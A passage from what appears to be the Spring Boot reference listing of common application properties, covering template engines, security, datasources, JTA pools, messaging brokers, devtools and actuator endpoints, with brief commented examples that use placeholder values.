({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.charset=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.enabled=true # enable MVC view 
resolution\n\tspring.velocity.expose-request-attributes=false\n\tspring.velocity.expose-session-attributes=false\n\tspring.velocity.expose-spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.toolbox-config-location= # velocity Toolbox config location, for example \"\/WEB-INF\/toolbox.xml\"\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=true\n\tspring.mustache.charset=UTF-8\n\tspring.mustache.check-template-location=true\n\tspring.mustache.content-type=text\/html\n\tspring.mustache.enabled=true # enable MVC view resolution\n\tspring.mustache.prefix=\n\tspring.mustache.suffix=.html\n\tspring.mustache.view-names= # whitelist of view names that can be resolved\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.type=servlet # servlet or filter\n\tspring.jersey.init= # init params\n\tspring.jersey.filter.order=\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cache-seconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.basic.authorize-mode= # ROLE, AUTHENTICATED, NONE\n\tsecurity.filter-order=0\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties])\n\tsecurity.oauth2.client.client-id= # OAuth2 client id\n    security.oauth2.client.client-secret= # OAuth2 client secret. A random secret is generated by default\n\n    # SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties])\n    security.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter\n    security.oauth2.sso.login-path= # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server
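\n\n\t# For example, a fixed basic-auth login for development\n\t# (the values shown are placeholders, not recommended defaults):\n\t# security.user.name=admin\n\t# security.user.password=secret\n\t# security.user.role=USER,ADMIN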
\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if the database cannot be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.jndi-name= # For JNDI lookup (class, url, username & password are ignored when set)\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\tspring.datasource.jmx-enabled=false # Export JMX MBeans (if supported)\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27017)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongodb.database=\n\tspring.data.mongodb.authentication-database=\n\tspring.data.mongodb.grid-fs-database=\n\tspring.data.mongodb.username=\n\tspring.data.mongodb.password=\n\tspring.data.mongodb.repositories.enabled=true # if spring data repository support is enabled\n\tspring.data.mongodb.field-naming-strategy= # fully qualified name of the FieldNamingStrategy to use\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled
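\n\n\t# For example, a MySQL DataSource validated by Hibernate on startup\n\t# (the URL and credentials are placeholders):\n\t# spring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\t# spring.datasource.username=dbuser\n\t# spring.datasource.password=dbpass\n\t# spring.jpa.hibernate.ddl-auto=validate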
\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.log-dir= # transaction log dir\n\tspring.jta.*= # technology specific configuration\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect=\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating sessions\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections.
0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not producers and consumers should be cached\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool.
0 denotes no limit\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache.
0 disables the cache\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.datasource.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\t# DATA REST ({spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[RepositoryRestConfiguration])\n\tspring.data.rest.base-path= # base path against which the exporter should calculate its links\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.*= # Any public property available on the auto-configured `Flyway` object\n\tflyway.check-location=false # check that migration scripts location exists\n\tflyway.locations=classpath:db\/migration # locations of migration scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version=1 # version to start migration\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource
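\n\n\t# With the defaults above, Flyway looks in classpath:db\/migration for\n\t# scripts named like V1__init.sql (the file name here is illustrative)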
\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.check-change-log-location=true # check that the change log location exists\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\tspring.jmx.server=mbeanServer # MBeanServer bean name\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.dynamic=true # create an AmqpAdmin bean\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.requested-heartbeat= # requested heartbeat timeout, in seconds; zero for none\n\tspring.rabbitmq.ssl.enabled=false # enable SSL support\n\tspring.rabbitmq.ssl.key-store= # path to the key store that holds the SSL certificate\n\tspring.rabbitmq.ssl.key-store-password= # password used to access the key store\n\tspring.rabbitmq.ssl.trust-store= # trust store that holds SSL certificates\n\tspring.rabbitmq.ssl.trust-store-password= # password used to access the trust store\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.virtual-host= # virtual host to use when connecting to the broker
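\n\n\t# For example, a single local broker with explicit credentials\n\t# (5672 is the conventional AMQP port; the credentials are placeholders):\n\t# spring.rabbitmq.host=localhost\n\t# spring.rabbitmq.port=5672\n\t# spring.rabbitmq.username=guest\n\t# spring.rabbitmq.password=guest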
\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database= # database name\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\tspring.redis.sentinel.master= # name of Redis server\n\tspring.redis.sentinel.nodes= # comma-separated list of host:port pairs\n\tspring.redis.timeout= # connection timeout in milliseconds\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.mode= # connection mode (native, embedded)\n\tspring.artemis.host=localhost # Artemis host (native mode)\n\tspring.artemis.port=5445 # Artemis port (native mode)\n\tspring.artemis.embedded.enabled=true # if the embedded server is enabled (needs artemis-jms-server.jar)\n\tspring.artemis.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.artemis.embedded.persistent=false # message persistence\n\tspring.artemis.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.artemis.embedded.queues= # comma-separated queues to create on startup\n\tspring.artemis.embedded.topics= # comma-separated topics to create on startup\n\tspring.artemis.embedded.cluster-password= # cluster password (randomly generated by default)\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # cluster password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # JNDI location of a JMS ConnectionFactory\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.host=smtp.acme.org # mail server host\n\tspring.mail.port= # mail server port\n\tspring.mail.username=\n\tspring.mail.password=\n\tspring.mail.default-encoding=UTF-8 # encoding to use for MimeMessages\n\tspring.mail.properties.*= # properties to set on the JavaMail session\n\tspring.mail.jndi-name= # JNDI location of a Mail Session\n\tspring.mail.test-connection=false # Test that the mail server is available on startup\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\tspring.batch.table-prefix= # table prefix for all the batch meta-data tables\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.type= # generic, ehcache, hazelcast, infinispan, jcache, redis, guava, simple, none\n\tspring.cache.cache-names= # cache names to create on startup\n\tspring.cache.ehcache.config= # location of the ehcache configuration\n\tspring.cache.hazelcast.config= # location of the hazelcast configuration\n\tspring.cache.infinispan.config= # location of the infinispan configuration\n\tspring.cache.jcache.config= # location of jcache configuration\n\tspring.cache.jcache.provider= # fully qualified name of the CachingProvider implementation to use\n\tspring.cache.guava.spec= # link:http:\/\/docs.guava-libraries.googlecode.com\/git\/javadoc\/com\/google\/common\/cache\/CacheBuilderSpec.html[guava specs]\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret
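\n\n\t# For example, enabling Twitter integration only requires the consumer\n\t# credentials of a registered Twitter app (placeholders shown):\n\t# spring.social.twitter.app-id=myTwitterAppId\n\t# spring.social.twitter.app-secret=myTwitterAppSecret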
\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default; set to true to enable\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback= # enable support for fallback resolution, defaults to false\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n    # DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n    spring.devtools.restart.enabled=true # enable automatic restart\n    spring.devtools.restart.exclude= # patterns that should be excluded from triggering a full restart\n    spring.devtools.restart.poll-interval= # amount of time (in milliseconds) to wait between polling for classpath changes\n    spring.devtools.restart.quiet-period= # amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered\n    spring.devtools.restart.trigger-file= # name of a specific file that when changed will trigger the restart\n\tspring.devtools.livereload.enabled=true # enable a livereload.com compatible server\n    spring.devtools.livereload.port=35729 # server port\n\n    # REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n    spring.devtools.remote.context-path=\/.~~spring-boot!~ # context path used to handle the remote connection\n    spring.devtools.remote.debug.enabled=true # enable remote debug support\n    spring.devtools.remote.debug.local-port=8000 # local remote debug server port\n    spring.devtools.remote.restart.enabled=true # enable remote restart\n    spring.devtools.remote.secret= # a shared secret required to establish a connection\n    spring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret
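\n\n\t# For example, remote support stays off until a shared secret is set:\n\t# spring.devtools.remote.secret=mysecret # placeholder value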
\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # defaults to '\/'\n\tmanagement.add-application-context-header= # defaults to true\n\tmanagement.security.enabled=true # enable security\n\tmanagement.security.role=ADMIN # role required to access the management endpoint\n\tmanagement.security.sessions=stateless # session creating policy to use (always, never, if_required, stateless)\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.file= # Location of the PID file to write\n\tspring.pid.fail-on-write-error= # Fail if the PID file cannot be written\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.enabled=true # enable all endpoints\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=true\n\tendpoints.health.enabled=true\n\tendpoints.health.mapping.*= # mapping of health statuses to HttpStatus codes\n\tendpoints.health.time-to-live=1000\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.logfile.path=\/logfile\n\tendpoints.logfile.sensitive=true\n\tendpoints.logfile.enabled=true\n\tendpoints.mappings.enabled=true\n\tendpoints.mappings.id=mappings\n\tendpoints.mappings.sensitive=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true
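\n\n\t# For example, to expose only the health and info endpoints:\n\t# endpoints.enabled=false\n\t# endpoints.health.enabled=true\n\t# endpoints.info.enabled=true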
\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/MvcEndpointCorsProperties.{sc-ext}[MvcEndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # set whether user credentials are supported. When not set, credentials are not supported.\n\tendpoints.cors.allowed-origins= # comma-separated list of origins to allow. * allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.allowed-methods= # comma-separated list of methods to allow. * allows all methods. When not set, defaults to GET.\n\tendpoints.cors.allowed-headers= # comma-separated list of headers to allow in a request. * allows all headers.\n\tendpoints.cors.exposed-headers= # comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # how long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true\n\tmanagement.health.elasticsearch.enabled=true\n\tmanagement.health.elasticsearch.indices= # comma-separated index names\n\tmanagement.health.elasticsearch.response-timeout=100 # the time, in milliseconds, to wait for a response from the 